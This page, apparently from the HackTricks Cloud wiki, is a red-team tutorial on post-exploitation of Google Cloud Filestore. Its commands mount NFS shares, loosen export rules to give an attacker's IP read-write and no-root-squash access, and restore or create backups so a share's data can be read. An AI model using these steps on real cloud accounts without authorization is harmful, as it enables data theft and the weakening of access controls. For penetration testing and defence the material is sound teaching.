# GCP - Filestore Post Exploitation

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Filestore

For more information about Filestore check:

{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
{% endcontent-ref %}

### Mount Filestore

A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:

{% code overflow="wrap" %}
```bash
sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
```
{% endcode %}

To find the IP address of a filestore insatnce check the enumeration section of the page:

{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
{% endcontent-ref %}

### Remove Restrictions and get extra permissions

If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:

```bash
gcloud filestore instances update nfstest \
    --zone=<exact-zone> \
    --flags-file=nfs.json

# Contents of nfs.json
{
  "--file-share":
  {
    "capacity": "1024",
    "name": "<share-name>",
    "nfs-export-options": [
      {
        "access-mode": "READ_WRITE",
        "ip-ranges": [
          "<your-ip-private-address>/32"
        ],
        "squash-mode": "NO_ROOT_SQUASH",
        "anon_uid": 1003,
        "anon_gid": 1003
      }
    ]
  }
}
```

### Restore a backup

If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**

```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
    --zone=<zone> \
    --tier=STANDARD \
    --file-share=name=vol1,capacity=1TB \
    --network=name=default,reserved-ip-range=10.0.0.0/29
    
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
    --zone=<zone> \
    --file-share=<instance-file-share-name> \
    --source-backup=<backup-name> \
    --source-backup-region=<backup-region>

# Follow the previous section commands to mount it
```

### Create a backup and restore it

If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:

{% code overflow="wrap" %}
```bash
# Create share backup
gcloud filestore backups create <back-name> \
    --region=<region> \
    --instance=<instance-name> \
    --instance-zone=<instance-zone> \
    --file-share=<share-name>

# Follow the previous section commands to restore it and mount it
```
{% endcode %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}